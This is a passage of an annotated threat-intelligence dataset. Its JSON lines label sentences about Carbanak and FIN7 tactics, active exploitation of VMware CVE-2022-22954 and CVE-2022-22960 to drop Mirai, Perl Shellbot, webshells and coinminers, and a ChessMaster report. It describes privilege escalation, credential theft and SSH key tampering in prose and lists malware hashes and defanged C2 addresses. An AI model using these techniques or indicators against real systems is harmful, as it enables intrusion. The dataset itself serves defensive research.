-{"id":3683,"text":"They also add programs to a startup folder that can be referenced with a registry run key.","entities":[],"relations":[],"Comments":[]} -{"id":3684,"text":"We detected a variant of the Carbanak malware that adds registry entries and keys as an autostart technique.","entities":[{"id":49477,"label":"malware","start_offset":29,"end_offset":45},{"id":49479,"label":"attack-pattern","start_offset":51,"end_offset":107}],"relations":[{"id":803,"from_id":49477,"to_id":49479,"type":"uses"}],"Comments":[]} -{"id":3685,"text":"Credentials of existing valid accounts were also abused.","entities":[],"relations":[],"Comments":[]} -{"id":3686,"text":"In the case of FIN7, the use of application shimming databases (which can allow developers to apply fixes to applications without rewriting code) and hooking processes that allow the modification of program behaviors are some of the techniques that can be applied.","entities":[{"id":49480,"label":"threat-actor","start_offset":15,"end_offset":19}],"relations":[],"Comments":[]} -{"id":3687,"text":"The former has been utilized in a campaign involving the Pillowmint malware.","entities":[{"id":49481,"label":"malware","start_offset":57,"end_offset":75}],"relations":[],"Comments":[]} -{"id":3688,"text":"Privilege Escalation","entities":[{"id":11194,"label":"attack-pattern","start_offset":0,"end_offset":20}],"relations":[],"Comments":[]} -{"id":3689,"text":"Some functions that are needed for the attack require admin privileges.","entities":[],"relations":[],"Comments":[]} -{"id":3690,"text":"To elevate privileges, the groups bypass Windows User Account Control (UAC) mechanisms, new services, and valid accounts to elevate process privileges.","entities":[{"id":49482,"label":"attack-pattern","start_offset":34,"end_offset":75}],"relations":[],"Comments":[]} -{"id":3691,"text":"For the same purpose, on Linux systems, Carbanak attacks can use sudo, a program that permits users to execute the programs of a superuser.","entities":[{"id":49483,"label":"threat-actor","start_offset":40,"end_offset":48}],"relations":[],"Comments":[]} -{"id":3692,"text":"FIN7 attacks can and inject code into processes and hijack the search order used to load DLL files.","entities":[{"id":49484,"label":"threat-actor","start_offset":0,"end_offset":4},{"id":49485,"label":"attack-pattern","start_offset":21,"end_offset":32},{"id":49486,"label":"attack-pattern","start_offset":52,"end_offset":98}],"relations":[{"id":804,"from_id":49484,"to_id":49485,"type":"uses"},{"id":805,"from_id":49484,"to_id":49486,"type":"uses"}],"Comments":[]} -{"id":3693,"text":"Defense Evasion","entities":[],"relations":[],"Comments":[]} -{"id":3694,"text":"After a series of malicious behavior, attackers need to remain stealthy and undetected by using security solutions that can remove threats out of the system.","entities":[],"relations":[],"Comments":[]} -{"id":3695,"text":"For defense evasion, both groups create or acquire tools for code signing the malware, or deobfuscate or decode files or information by using malware functions or utilities in the system.","entities":[],"relations":[],"Comments":[]} -{"id":3696,"text":"Both groups also employ masquerading to make features appear benign to security solutions, files or information obfuscation to make these files and information difficult to discover, software packing to conceal code, and process injection to evade process-based defense.","entities":[{"id":49487,"label":"attack-pattern","start_offset":24,"end_offset":36},{"id":49488,"label":"attack-pattern","start_offset":221,"end_offset":238},{"id":49490,"label":"attack-pattern","start_offset":183,"end_offset":199},{"id":49489,"label":"attack-pattern","start_offset":91,"end_offset":123}],"relations":[],"Comments":[]} -{"id":3697,"text":"Carbanak also performs techniques for disabling security tools, deleting files that are left in malicious activity, and modifying registry to hide configuration information.","entities":[{"id":49494,"label":"attack-pattern","start_offset":120,"end_offset":138},{"id":49493,"label":"attack-pattern","start_offset":64,"end_offset":78},{"id":49491,"label":"attack-pattern","start_offset":38,"end_offset":62},{"id":49492,"label":"threat-actor","start_offset":0,"end_offset":8}],"relations":[{"id":806,"from_id":49492,"to_id":49491,"type":"uses"},{"id":807,"from_id":49492,"to_id":49493,"type":"uses"},{"id":808,"from_id":49492,"to_id":49494,"type":"uses"}],"Comments":[]} -{"id":3698,"text":"FIN7 utilizes guardrails to restrict execution and abused utilities that allow indirect command execution that can go past security restrictions.","entities":[{"id":49495,"label":"attack-pattern","start_offset":79,"end_offset":105},{"id":49496,"label":"threat-actor","start_offset":0,"end_offset":4},{"id":49497,"label":"tools","start_offset":14,"end_offset":24}],"relations":[{"id":809,"from_id":49496,"to_id":49497,"type":"uses"},{"id":810,"from_id":49496,"to_id":49495,"type":"uses"}],"Comments":[]} -{"id":3699,"text":"The group also evades virtualization and sandboxes and injects malicious code into hollowed processes to dodge process-based defenses.","entities":[{"id":49498,"label":"attack-pattern","start_offset":15,"end_offset":50},{"id":49499,"label":"attack-pattern","start_offset":56,"end_offset":77}],"relations":[],"Comments":[]} -{"id":3700,"text":"Credential Access","entities":[],"relations":[],"Comments":[]} -{"id":3701,"text":"Some portions of the system are protected by credentials.","entities":[],"relations":[],"Comments":[]} -{"id":3702,"text":"To steal these, both groups employed credential dumping and input capture.","entities":[{"id":11230,"label":"attack-pattern","start_offset":37,"end_offset":55},{"id":11232,"label":"attack-pattern","start_offset":60,"end_offset":73}],"relations":[],"Comments":[]} -{"id":3703,"text":"The former involves credentials that are usually in the form of hash or clear text, while the latter involves API or web portals.","entities":[],"relations":[],"Comments":[]} -{"id":3704,"text":"Carbanak also performs brute force tactics or takes advantage of credentials that are saved in web browsers.","entities":[{"id":11236,"label":"attack-pattern","start_offset":23,"end_offset":34}],"relations":[],"Comments":[]} -{"id":3705,"text":"On the other hand, FIN7 performs hooking.","entities":[{"id":11240,"label":"attack-pattern","start_offset":33,"end_offset":40},{"id":49500,"label":"threat-actor","start_offset":19,"end_offset":23}],"relations":[{"id":811,"from_id":49500,"to_id":11240,"type":"uses"}],"Comments":[]} -{"id":3706,"text":"Discovery","entities":[],"relations":[],"Comments":[]} -{"id":3707,"text":"For the discovery phase, the Carbanak and FIN7 campaigns gain more knowledge about the system by gathering listings of various information: open application windows, running processes, IP addresses and other network identifiers in remote systems, detailed hardware and system information, system network configuration and settings, and system owners and users.","entities":[{"id":49502,"label":"threat-actor","start_offset":42,"end_offset":46},{"id":49501,"label":"threat-actor","start_offset":29,"end_offset":37}],"relations":[],"Comments":[]} -{"id":3708,"text":"Carbanak also collects information on accounts, files and directories, group permissions, and registries.","entities":[{"id":49503,"label":"threat-actor","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} -{"id":3709,"text":"FIN7 gathers information on network shares.","entities":[{"id":49504,"label":"threat-actor","start_offset":0,"end_offset":4}],"relations":[],"Comments":[]} -{"id":3710,"text":"The gathered information can aid in the next step: lateral movement.","entities":[{"id":49505,"label":"attack-pattern","start_offset":51,"end_offset":67}],"relations":[],"Comments":[]} -{"id":3711,"text":"Lateral Movement","entities":[{"id":49506,"label":"attack-pattern","start_offset":0,"end_offset":16}],"relations":[],"Comments":[]} -{"id":3712,"text":"The groups move through the network and identify key assets and data by logging in via RDP, copying files to upload adversary tools through remote file copy, and abusing Window admin shares.","entities":[{"id":49508,"label":"attack-pattern","start_offset":162,"end_offset":189},{"id":49507,"label":"attack-pattern","start_offset":140,"end_offset":156}],"relations":[],"Comments":[]} -{"id":3713,"text":"In Carbanak attacks, the groups’ attacks can involve logging into services that accept remote connections and using stolen password hashes through the “pass the hash” method.","entities":[{"id":49509,"label":"attack-pattern","start_offset":152,"end_offset":165},{"id":49510,"label":"threat-actor","start_offset":3,"end_offset":11},{"id":49511,"label":"attack-pattern","start_offset":110,"end_offset":138}],"relations":[{"id":812,"from_id":49510,"to_id":49511,"type":"uses"},{"id":813,"from_id":49510,"to_id":49509,"type":"uses"}],"Comments":[]} -{"id":3714,"text":"Collection","entities":[],"relations":[],"Comments":[]} -{"id":3715,"text":"After moving through the network and identifying assets to target, the next step would be to gather key data.","entities":[],"relations":[],"Comments":[]} -{"id":3716,"text":"At the collection phase, Carbanak and FIN7 campaigns harvest data from local system sources and through input and screen capture (as performed in a related campaign using the Tirion malware).","entities":[{"id":49515,"label":"attack-pattern","start_offset":53,"end_offset":91},{"id":49516,"label":"attack-pattern","start_offset":114,"end_offset":128},{"id":49512,"label":"threat-actor","start_offset":25,"end_offset":33},{"id":49513,"label":"threat-actor","start_offset":38,"end_offset":42},{"id":49514,"label":"malware","start_offset":175,"end_offset":189}],"relations":[{"id":814,"from_id":49512,"to_id":49513,"type":"related-to"},{"id":815,"from_id":49512,"to_id":49515,"type":"uses"},{"id":816,"from_id":49512,"to_id":49516,"type":"uses"}],"Comments":[]} -{"id":3717,"text":"FIN7 attacks can stage collected data in a particular location in preparation for exfiltration.","entities":[{"id":49517,"label":"threat-actor","start_offset":0,"end_offset":4}],"relations":[],"Comments":[]} -{"id":3718,"text":"Command and Control","entities":[],"relations":[],"Comments":[]} -{"id":3719,"text":"In both Carbanak and FIN7 attacks, communication with users’ compromised systems is done through bypassing firewalls or network detection systems via commonly used ports, using connection proxies to avoid direct connections to the threat group’s infrastructure, employing the command-and-control channel to remotely copy files from an external system, blending in with existing network traffic by using standard application layer protocol, and taking advantage of standard cryptographic protocol to disguise command-and-control traffic.","entities":[{"id":49518,"label":"threat-actor","start_offset":8,"end_offset":16},{"id":49519,"label":"threat-actor","start_offset":21,"end_offset":25},{"id":49520,"label":"attack-pattern","start_offset":97,"end_offset":116},{"id":49521,"label":"attack-pattern","start_offset":171,"end_offset":195},{"id":49522,"label":"attack-pattern","start_offset":352,"end_offset":393}],"relations":[{"id":817,"from_id":49518,"to_id":49519,"type":"related-to"},{"id":818,"from_id":49519,"to_id":49520,"type":"uses"},{"id":819,"from_id":49519,"to_id":49521,"type":"uses"},{"id":820,"from_id":49519,"to_id":49522,"type":"uses"}],"Comments":[]} -{"id":3720,"text":"Carbanak campaigns can also use legitimate programs and remote access software for command and control.","entities":[{"id":49523,"label":"threat-actor","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} -{"id":3721,"text":"They also employ standard non-application layer protocols for communication.","entities":[],"relations":[],"Comments":[]} -{"id":3722,"text":"Exfiltration","entities":[],"relations":[],"Comments":[]} -{"id":3723,"text":"In the final phase of the attack, the groups exfiltrate the stolen data into the normal communications channel via command-and-control channels.","entities":[],"relations":[],"Comments":[]} -{"id":3724,"text":"For FIN7 attack routines, data can be compressed and\/or encrypted before being exfiltrated.","entities":[{"id":49524,"label":"threat-actor","start_offset":4,"end_offset":8}],"relations":[],"Comments":[]} -{"id":3725,"text":"ATT&CK® tactics and techniques for Linux were also shared by MITRE.","entities":[{"id":49525,"label":"identity","start_offset":61,"end_offset":66},{"id":49526,"label":"SOFTWARE","start_offset":35,"end_offset":40}],"relations":[],"Comments":[]} -{"id":3726,"text":"Continuous vigilance against threat groups is an important aspect of keeping up with — if not being one step ahead of — threats.","entities":[],"relations":[],"Comments":[]} -{"id":3727,"text":"Solutions such as Trend Micro Vision One™️ provide visibility, correlated detection, and behavior monitoring across multiple layers: email, endpoints, servers, cloud workloads.","entities":[{"id":49527,"label":"SOFTWARE","start_offset":18,"end_offset":40}],"relations":[],"Comments":[]} -{"id":3728,"text":" Tags Endpoints | APT & Targeted Attacks | Research | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} -{"id":3729,"text":"This post is also available in: 日本語 (Japanese) ","entities":[],"relations":[],"Comments":[]} -{"id":3730,"text":"On April 6, 2022, VMware published a security advisory mentioning eight vulnerabilities, including CVE-2022-22954 and CVE-2022-22960 impacting their products VMware Workspace ONE Access, Identity Manager and vRealize Automation.","entities":[{"id":49530,"label":"vulnerability","start_offset":99,"end_offset":113},{"id":49531,"label":"vulnerability","start_offset":118,"end_offset":132},{"id":49533,"label":"SOFTWARE","start_offset":187,"end_offset":203},{"id":49534,"label":"SOFTWARE","start_offset":208,"end_offset":227},{"id":49532,"label":"SOFTWARE","start_offset":158,"end_offset":185},{"id":49528,"label":"TIME","start_offset":3,"end_offset":16},{"id":49529,"label":"identity","start_offset":18,"end_offset":24}],"relations":[{"id":821,"from_id":49532,"to_id":49530,"type":"has"},{"id":822,"from_id":49532,"to_id":49531,"type":"has"},{"id":823,"from_id":49533,"to_id":49530,"type":"has"},{"id":824,"from_id":49533,"to_id":49531,"type":"has"},{"id":825,"from_id":49534,"to_id":49530,"type":"has"},{"id":826,"from_id":49534,"to_id":49531,"type":"has"}],"Comments":[]} -{"id":3731,"text":"On April 13, they updated their advisory with information that CVE-2022-22954 is being exploited in the wild.","entities":[{"id":49535,"label":"vulnerability","start_offset":63,"end_offset":77},{"id":49536,"label":"TIME","start_offset":3,"end_offset":11}],"relations":[],"Comments":[]} -{"id":3732,"text":" Multiple writeups detailing exploitation scenarios for the aforementioned two vulnerabilities were published in the last week of April, finally followed by a CISA Alert on May 18.","entities":[{"id":49537,"label":"TIME","start_offset":117,"end_offset":135},{"id":49538,"label":"identity","start_offset":159,"end_offset":163},{"id":49539,"label":"TIME","start_offset":173,"end_offset":179}],"relations":[],"Comments":[]} -{"id":3733,"text":"The CISA Alert also calls out CVE-2022-22972 and CVE-2022-22973 – published on the same day and affecting the same products – as being highly likely to be exploited.","entities":[{"id":49540,"label":"identity","start_offset":4,"end_offset":8},{"id":49542,"label":"vulnerability","start_offset":49,"end_offset":63},{"id":49541,"label":"vulnerability","start_offset":30,"end_offset":44}],"relations":[],"Comments":[]} -{"id":3734,"text":" Unit 42 has observed numerous instances of CVE-2022-22954 being exploited in the wild.","entities":[{"id":11330,"label":"identity","start_offset":1,"end_offset":8},{"id":49543,"label":"vulnerability","start_offset":44,"end_offset":58}],"relations":[],"Comments":[]} -{"id":3735,"text":"In this blog post, we share context around this observed activity, along with how the Palo Alto Networks product suite can be leveraged to protect against it.","entities":[{"id":49544,"label":"identity","start_offset":86,"end_offset":104}],"relations":[],"Comments":[]} -{"id":3736,"text":"Timeline for VMware Vulnerabilities CVE-2022-22954 in the Wild Direct Downloads Mirai\/Gafgyt Dropper Scripts or Variants Webshells Perl Shellbot Base64 Injections SSH Key Targeting CVE-2022-22960 in the Wild Conclusion Indicators of Compromise","entities":[{"id":49545,"label":"vulnerability","start_offset":13,"end_offset":50},{"id":49546,"label":"malware","start_offset":80,"end_offset":85},{"id":49547,"label":"malware","start_offset":86,"end_offset":100},{"id":49548,"label":"vulnerability","start_offset":181,"end_offset":195}],"relations":[{"id":827,"from_id":49546,"to_id":49547,"type":"related-to"},{"id":828,"from_id":49546,"to_id":49545,"type":"exploits"},{"id":829,"from_id":49546,"to_id":49548,"type":"exploits"}],"Comments":[]} -{"id":3737,"text":" 2022-04-06:","entities":[{"id":49549,"label":"TIME","start_offset":1,"end_offset":11}],"relations":[],"Comments":[]} -{"id":3738,"text":"Publication of VMware advisory VMSA-2022-0011 regarding CVE-2022-22954, CVE-2022-22955,CVE-2022-22956, CVE-2022-22957, CVE-2022-22958, CVE-2022-22959, CVE-2022-22960, CVE-2022-22961.","entities":[{"id":49550,"label":"identity","start_offset":15,"end_offset":21},{"id":49551,"label":"vulnerability","start_offset":56,"end_offset":70},{"id":49552,"label":"vulnerability","start_offset":72,"end_offset":86},{"id":49553,"label":"vulnerability","start_offset":87,"end_offset":101},{"id":49554,"label":"vulnerability","start_offset":103,"end_offset":117},{"id":49555,"label":"vulnerability","start_offset":119,"end_offset":133},{"id":49556,"label":"vulnerability","start_offset":135,"end_offset":149},{"id":49557,"label":"vulnerability","start_offset":151,"end_offset":165},{"id":49558,"label":"vulnerability","start_offset":167,"end_offset":181}],"relations":[],"Comments":[]} -{"id":3739,"text":"2022-04","entities":[{"id":49559,"label":"TIME","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} -{"id":3740,"text":"-11:","entities":[],"relations":[],"Comments":[]} -{"id":3741,"text":"Proofs of concept available on GitHub.","entities":[{"id":49560,"label":"SOFTWARE","start_offset":31,"end_offset":37}],"relations":[],"Comments":[]} -{"id":3742,"text":"This is also the earliest date at which Unit 42 observed exploitation attempts and scanning activity. 2022-04-13: VMware advisory updated with knowledge of active exploitation of CVE-2022-22954 in the wild.","entities":[{"id":49562,"label":"TIME","start_offset":103,"end_offset":113},{"id":49563,"label":"identity","start_offset":115,"end_offset":121},{"id":49561,"label":"identity","start_offset":40,"end_offset":47},{"id":49564,"label":"vulnerability","start_offset":180,"end_offset":194}],"relations":[],"Comments":[]} -{"id":3743,"text":"2022-05-18:","entities":[{"id":49565,"label":"TIME","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} -{"id":3744,"text":"Publication of VMware advisory VMSA-2022-0014 regarding CVE-2022-22972, CVE-2022-22973.","entities":[{"id":49568,"label":"vulnerability","start_offset":72,"end_offset":86},{"id":49566,"label":"identity","start_offset":15,"end_offset":21},{"id":49567,"label":"vulnerability","start_offset":56,"end_offset":70}],"relations":[],"Comments":[]} -{"id":3745,"text":"Publication of CISA Alert.","entities":[{"id":49569,"label":"identity","start_offset":15,"end_offset":19}],"relations":[],"Comments":[]} -{"id":3746,"text":" As of this writing, no proofs of concept for exploitation of CVE-22972 or CVE-2022-22973 are known.","entities":[{"id":49571,"label":"vulnerability","start_offset":75,"end_offset":89},{"id":49570,"label":"vulnerability","start_offset":62,"end_offset":71}],"relations":[],"Comments":[]} -{"id":3747,"text":"This post will be updated with new findings as they are discovered.","entities":[],"relations":[],"Comments":[]} -{"id":3748,"text":" CVE-2022-22954, a remote code execution (RCE) vulnerability due to server-side template injection in VMware Workspace ONE Access and Identity Manager, is trivial to exploit with a single HTTP request to a vulnerable device.","entities":[{"id":49573,"label":"attack-pattern","start_offset":19,"end_offset":46},{"id":49574,"label":"attack-pattern","start_offset":68,"end_offset":98},{"id":49572,"label":"vulnerability","start_offset":1,"end_offset":15},{"id":49575,"label":"SOFTWARE","start_offset":102,"end_offset":150}],"relations":[{"id":830,"from_id":49575,"to_id":49572,"type":"has"},{"id":831,"from_id":49572,"to_id":49573,"type":"uses"},{"id":832,"from_id":49572,"to_id":49574,"type":"uses"}],"Comments":[]} -{"id":3749,"text":" The list below details the exploits Unit 42 observed targeting this vulnerability that we deemed worth highlighting.","entities":[{"id":49576,"label":"identity","start_offset":37,"end_offset":44}],"relations":[],"Comments":[]} -{"id":3750,"text":"The injected commands worth mentioning that intended to further download payloads to a vulnerable machine can be categorized into the following broad categories: We observed several instances of CVE-2022-22954 being exploited to drop variants of the Mirai malware.","entities":[{"id":49577,"label":"vulnerability","start_offset":196,"end_offset":210},{"id":49578,"label":"malware","start_offset":251,"end_offset":264}],"relations":[{"id":833,"from_id":49578,"to_id":49577,"type":"exploits"}],"Comments":[]} -{"id":3751,"text":"In most cases, the exploit was only used to drop the payload, however the payloads themself did not contain CVE-2022-22954 exploits for further propagation.","entities":[{"id":49579,"label":"vulnerability","start_offset":108,"end_offset":122}],"relations":[],"Comments":[]} -{"id":3752,"text":"Instead, they were either non-specific Mirai variants or contained previously known exploits such as CVE-2017-17215.","entities":[{"id":49581,"label":"malware","start_offset":39,"end_offset":44},{"id":49580,"label":"vulnerability","start_offset":101,"end_offset":115}],"relations":[{"id":834,"from_id":49581,"to_id":49580,"type":"exploits"}],"Comments":[]} -{"id":3753,"text":" The exception to this is Enemybot, a currently prevalent botnet built with bits of code from both Gafgyt and Mirai source code.","entities":[{"id":49584,"label":"malware","start_offset":110,"end_offset":115},{"id":49582,"label":"malware","start_offset":26,"end_offset":34},{"id":49583,"label":"malware","start_offset":99,"end_offset":105}],"relations":[{"id":835,"from_id":49582,"to_id":49583,"type":"variant-of"},{"id":836,"from_id":49582,"to_id":49584,"type":"variant-of"}],"Comments":[]} -{"id":3754,"text":"The exploits involving Enemybot eventually download Enemybot samples that themselves embed CVE-2022-22954 exploits for further exploitation and propagation.","entities":[{"id":11380,"label":"malware","start_offset":23,"end_offset":31},{"id":49586,"label":"vulnerability","start_offset":91,"end_offset":105},{"id":49585,"label":"malware","start_offset":52,"end_offset":60}],"relations":[{"id":837,"from_id":49585,"to_id":49586,"type":"exploits"},{"id":838,"from_id":11380,"to_id":49585,"type":"downloads"}],"Comments":[]} -{"id":3755,"text":" We observed the vulnerability exploited to download webshells, including: Certain injected commands result in the download of obfuscated Perl scripts.","entities":[{"id":49588,"label":"attack-pattern","start_offset":128,"end_offset":151},{"id":49587,"label":"attack-pattern","start_offset":53,"end_offset":62}],"relations":[],"Comments":[]} -{"id":3756,"text":"Deobfuscating these scripts reveals they are versions of the known bot family “Stealth Shellbot” that reaches out to an IRC server to listen for commands to perform.","entities":[{"id":49589,"label":"malware","start_offset":79,"end_offset":95}],"relations":[],"Comments":[]} -{"id":3757,"text":"It has the ability to further make HTTP requests based on commands received.","entities":[],"relations":[],"Comments":[]} -{"id":3758,"text":"This would mean infected machines could then be directed to further perform scanning and exploitation activity, in addition to directly executing shell commands received from the command and control (C2) server on the target machine.","entities":[],"relations":[],"Comments":[]} -{"id":3759,"text":" A complete list of indicators of compromise (IoCs) can be found at the end of this post.","entities":[],"relations":[],"Comments":[]} -{"id":3760,"text":" This last command downloads a shell script that ultimately downloads and executes an XMRig coinminer.","entities":[{"id":49590,"label":"malware","start_offset":86,"end_offset":101}],"relations":[],"Comments":[]} -{"id":3761,"text":" We also observed some instances of injected payloads that were either trying to read authorized keys on vulnerable machines or were writing into the authorized_keys file to add to the machine’s list of accepted keys.","entities":[],"relations":[],"Comments":[]} -{"id":3762,"text":"Following is an example of such an attempt.","entities":[],"relations":[],"Comments":[]} -{"id":3763,"text":" CVE-2022-22960 is a privilege escalation vulnerability in VMware Workspace ONE Access, Identity Manager and vRealize Automation instances, due to improper permissions in support scripts.","entities":[{"id":49592,"label":"attack-pattern","start_offset":21,"end_offset":41},{"id":49593,"label":"SOFTWARE","start_offset":59,"end_offset":128},{"id":49591,"label":"vulnerability","start_offset":1,"end_offset":15}],"relations":[{"id":839,"from_id":49591,"to_id":49592,"type":"uses"},{"id":840,"from_id":49593,"to_id":49591,"type":"has"}],"Comments":[]} -{"id":3764,"text":"The vulnerability can be leveraged to run commands as a root user on a vulnerable instance.","entities":[],"relations":[],"Comments":[]} -{"id":3765,"text":" More specifically, this flaw exists since the default user for these VMware products, horizon, has access to several sudo commands, some of which involve paths that can be overwritten as well.","entities":[{"id":49594,"label":"identity","start_offset":70,"end_offset":76},{"id":49595,"label":"SOFTWARE","start_offset":87,"end_offset":94}],"relations":[],"Comments":[]} -{"id":3766,"text":" Attackers can, therefore, leverage CVE-2022-22954 to remotely execute commands to overwrite specific paths.","entities":[{"id":49598,"label":"attack-pattern","start_offset":83,"end_offset":107},{"id":49596,"label":"vulnerability","start_offset":36,"end_offset":50},{"id":49597,"label":"attack-pattern","start_offset":54,"end_offset":79}],"relations":[{"id":842,"from_id":49596,"to_id":49597,"type":"uses"},{"id":843,"from_id":49596,"to_id":49598,"type":"uses"}],"Comments":[]} -{"id":3767,"text":"If successful, CVE-2022-22960 can then be leveraged to execute these overwritten paths with root permissions using the sudo command.","entities":[{"id":49599,"label":"vulnerability","start_offset":15,"end_offset":29}],"relations":[],"Comments":[]} -{"id":3768,"text":" Our research so far has shown one publicly known sample demonstrating exploitation of CVE-2022-22960 by overwriting the \/usr\/local\/horizon\/scripts\/publishCaCert.hzn file.","entities":[{"id":49600,"label":"vulnerability","start_offset":87,"end_offset":101},{"id":49601,"label":"FILEPATH","start_offset":121,"end_offset":165}],"relations":[{"id":841,"from_id":49601,"to_id":49600,"type":"related-to"}],"Comments":[]} -{"id":3769,"text":" The content of this exploit file can be observed below.","entities":[],"relations":[],"Comments":[]} -{"id":3770,"text":" Another proof of concept code sample is additionally available targeting the following 2 filepaths: \/opt\/vmware\/certproxy\/bin\/certproxyService.sh \/usr\/local\/horizon\/scripts\/diagnostic\/getPasswordExpiry.hzn ","entities":[{"id":49603,"label":"FILEPATH","start_offset":148,"end_offset":207},{"id":49602,"label":"FILEPATH","start_offset":102,"end_offset":147}],"relations":[],"Comments":[]} -{"id":3771,"text":"Palo Alto Networks is still actively investigating a number of the aforementioned vulnerabilities, many of which do not have publicly available exploit code.","entities":[{"id":49604,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} -{"id":3772,"text":"Presently, customers may leverage the following to block or detect the threats communicated throughout this publication:","entities":[],"relations":[],"Comments":[]} -{"id":3773,"text":"Palo Alto Networks Next Generation Firewall Threat Prevention blocks CVE-2022-22954 exploits with Signature 92483.","entities":[{"id":49605,"label":"SOFTWARE","start_offset":0,"end_offset":61},{"id":49606,"label":"vulnerability","start_offset":69,"end_offset":83}],"relations":[],"Comments":[]} -{"id":3774,"text":" Cortex Xpanse was able to identify ~800 instances of VMware Workspace ONE Access connected to the public internet, and can be leveraged to enumerate potentially vulnerable instances within customer networks.","entities":[{"id":49607,"label":"SOFTWARE","start_offset":1,"end_offset":14},{"id":49608,"label":"SOFTWARE","start_offset":54,"end_offset":81}],"relations":[],"Comments":[]} -{"id":3775,"text":" WildFire and Cortex XDR categorize all samples of supported file types as malware.","entities":[{"id":49609,"label":"SOFTWARE","start_offset":1,"end_offset":9},{"id":49610,"label":"SOFTWARE","start_offset":14,"end_offset":24}],"relations":[],"Comments":[]} -{"id":3776,"text":" Additionally, all encountered URLs have been flagged as malware within PAN-DB, the Advanced URL Filtering URL database.","entities":[],"relations":[],"Comments":[]} -{"id":3777,"text":" If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call: As further information or detections are put into place, Palo Alto Networks will update this publication accordingly.","entities":[{"id":49611,"label":"identity","start_offset":92,"end_offset":122},{"id":49612,"label":"identity","start_offset":190,"end_offset":208}],"relations":[],"Comments":[]} -{"id":3778,"text":" Palo Alto Networks has shared these findings, including file samples and indicators of compromise, with our fellow Cyber Threat Alliance members.","entities":[{"id":49616,"label":"identity","start_offset":116,"end_offset":145},{"id":49613,"label":"identity","start_offset":1,"end_offset":19}],"relations":[],"Comments":[]} -{"id":3779,"text":"CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors.","entities":[{"id":49615,"label":"identity","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} -{"id":3780,"text":"Learn more about the Cyber Threat Alliance.","entities":[{"id":49617,"label":"identity","start_offset":21,"end_offset":42}],"relations":[],"Comments":[]} -{"id":3781,"text":" Mirai\/Gafgyt dropper scripts or variants Perl Shellbot Coinminer activity Webshell downloads (full injected command) Callback\/Scanning activity Direct Download exploits where payloads were no longer live at the time of analysis: Sample hashes 801b23bffa65facee1da69bc6f72f8e1e4e1aeefc63dfd3a99b238d4f9d0a637 6d403c3fc246d6d493a6f4acc18c1c292f710db6ad9c3ea2ff065595c5ad3c5b 940a674cfe8179b2b8964bf408037e0e5a5ab7e47354fe4fa7a9289732e1f1b8 fdc94d0dedf6e53dd435d2b5eacb4c34923fadee50529db6f3de38c71f325e05 85143ecc41fb6aadd822ed2d6f20c721a83ae1088f406f29b8b0b05459053a03 bot.v 0b4b25fab4c922e752e689111f38957e0402fd83f6b1d69e8f43c6f4b68fc1ba C2 server : 5[.]39.217.212:80","entities":[{"id":11449,"label":"malware","start_offset":58,"end_offset":67},{"id":11452,"label":"SHA2","start_offset":251,"end_offset":315},{"id":11453,"label":"SHA2","start_offset":316,"end_offset":380},{"id":11454,"label":"SHA2","start_offset":381,"end_offset":445},{"id":11455,"label":"SHA2","start_offset":446,"end_offset":510},{"id":11456,"label":"SHA2","start_offset":511,"end_offset":575},{"id":11457,"label":"SHA2","start_offset":583,"end_offset":647},{"id":49619,"label":"IPV4","start_offset":660,"end_offset":677},{"id":49620,"label":"malware","start_offset":1,"end_offset":21}],"relations":[{"id":845,"from_id":11453,"to_id":49620,"type":"indicates"},{"id":844,"from_id":11452,"to_id":49620,"type":"indicates"},{"id":846,"from_id":11454,"to_id":49620,"type":"indicates"},{"id":847,"from_id":11455,"to_id":49620,"type":"indicates"},{"id":848,"from_id":11456,"to_id":49620,"type":"indicates"},{"id":849,"from_id":11457,"to_id":49620,"type":"indicates"},{"id":850,"from_id":49620,"to_id":49619,"type":"communicates-with"}],"Comments":[]} -{"id":3782,"text":"Channel : #vcenter getsome bot.redis 48628ca95608a015f47506eb1dc6fad0cd04a4cf5d44fdb8f10255fe0aa3c29b C2 server : 64[.]32.6.143:80","entities":[{"id":11458,"label":"SHA2","start_offset":38,"end_offset":102},{"id":49621,"label":"IPV4","start_offset":115,"end_offset":131}],"relations":[],"Comments":[]} -{"id":3783,"text":"Channel : #redis getsome botVNC c399b56e1baf063ca2c8aadbbe4a2b58141916aac8ef790a9c29762ed1956bd5 C2 server : 5[.]39.217.212:80","entities":[{"id":11459,"label":"SHA2","start_offset":33,"end_offset":97},{"id":49622,"label":"IPV4","start_offset":110,"end_offset":127}],"relations":[],"Comments":[]} -{"id":3784,"text":"Channel : #D getsome 7e29615126585b9f87ded09cfae4724bb5d7896c7daf2adfcef775924549e49b 099ac2f3e10346dbef472b2a7b443ebfe1f6011a9a2518a54c20aad07fe9ec61 Updated May 23, 2022, at 1 p.m. PT. Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[{"id":11461,"label":"SHA2","start_offset":88,"end_offset":152},{"id":11460,"label":"SHA2","start_offset":22,"end_offset":86},{"id":49623,"label":"TIME","start_offset":162,"end_offset":189}],"relations":[],"Comments":[]} -{"id":3785,"text":"Additional resources https:\/\/www.zerodayinitiative.com\/about https:\/\/www.zerodayinitiative.com\/blog Tags","entities":[{"id":11467,"label":"URL","start_offset":21,"end_offset":60},{"id":49624,"label":"URL","start_offset":61,"end_offset":99}],"relations":[],"Comments":[]} -{"id":3786,"text":" Latest News | Exploits & Vulnerabilities | Cyber Threats | Connected Car | APT & Targeted Attacks | Endpoints | IoT | Video","entities":[],"relations":[],"Comments":[]} -{"id":3787,"text":"Trend Micro discovered the ChessMaster campaign back in July 2017 as part of our monitoring efforts to protect our customers.","entities":[{"id":49626,"label":"identity","start_offset":0,"end_offset":11},{"id":49627,"label":"campaign","start_offset":27,"end_offset":47},{"id":49625,"label":"TIME","start_offset":56,"end_offset":65}],"relations":[],"Comments":[]} -{"id":3788,"text":"At the time, we found ChessMaster targeting different sectors from the academe to media and government agencies in 